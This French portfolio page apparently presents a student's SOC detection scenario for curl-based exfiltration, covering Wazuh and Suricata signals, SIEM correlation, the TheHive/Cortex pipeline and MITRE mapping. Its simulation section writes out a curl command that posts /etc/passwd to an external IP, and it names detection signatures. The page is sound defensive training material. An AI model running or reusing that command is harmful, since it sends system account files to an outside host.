Détection d’exfiltration via curl

Commande curl suspecte
cat case.md

SOC Detection Scenario

Détection d’exfiltration via curl

Ce scénario simule l’exécution d’une commande curl pouvant servir à contacter une infrastructure externe, télécharger un payload ou exfiltrer des données. L’objectif est de détecter le comportement, le contextualiser et le qualifier dans la chaîne SOC.

Curl Endpoint Logs Wazuh Suricata SOC
← Retour aux projets
more details.txt

Contexte

context

Le scénario vise à détecter une commande curl inhabituelle exécutée depuis une machine du lab. Ce type d’action peut être bénin, mais il peut aussi indiquer un téléchargement de payload, une tentative de beaconing ou une exfiltration vers une ressource distante.

Simulation

attack

Le comportement est simulé via une requête HTTP sortante vers une adresse IP externe avec envoi de données. 

curl -X POST http://217.160.0.187/upload --data-binary @/etc/passwd

Signal initial

signal

Le signal peut apparaître de deux façons complémentaires :

  • au niveau endpoint, via les journaux de processus et de ligne de commande collectés par Wazuh ;
  • au niveau réseau, via une alerte Suricata liée à un trafic HTTP suspect.

Détection réseau

nids

Suricata peut détecter ce comportement avec une signature orientée hunting sur l’usage de curl vers une IP directement utilisée dans l’URL. 

ET HUNTING curl User-Agent to Dotted Quad

Détection endpoint

hids

Côté endpoint, l’investigation porte sur la commande exécutée, le binaire utilisé, l’utilisateur, l’hôte source et la présence éventuelle d’arguments suspects comme --data-binary, http:// vers une IP, ou le ciblage de fichiers sensibles.

Analyse

analysis

L’analyse consiste à vérifier :

  • la ligne de commande complète ;
  • l’URL ou l’adresse IP contactée ;
  • la machine source et le compte utilisateur ;
  • l’heure d’exécution ;
  • les événements corrélés avant et après l’alerte.

Corrélation SIEM

correl
Process execution: curl suspicious arguments
+
Network alert: outbound HTTP to external IP
=
Possible exfiltration or payload staging

Pipeline SOC

pipeline

La chaîne SOC suit ce flux : 

Command execution on host
↓
Endpoint / network logs
↓
Wazuh ingestion
↓
Correlation and alerting
↓
Case creation in TheHive
↓
IOC enrichment in Cortex

Qualification

result

Le cas est qualifié comme activité potentiellement malveillante car il combine un outil système légitime, une destination externe inhabituelle et un transfert de données sensible. Cette qualification permet un triage clair et rapide côté SOC.

MITRE ATT&CK

mitre
  • T1041 — Exfiltration Over C2 Channel
  • T1105 — Ingress Tool Transfer
  • T1071.001 — Application Layer Protocol: Web Protocols

Ce que ça montre

impact

Ce projet met en avant ta capacité à détecter et analyser un comportement discret mais réaliste, à croiser les signaux endpoint et réseau, puis à le restituer dans une logique SOC exploitable. C’est très pertinent pour une alternance en Blue Team, SOC ou Detection Engineering.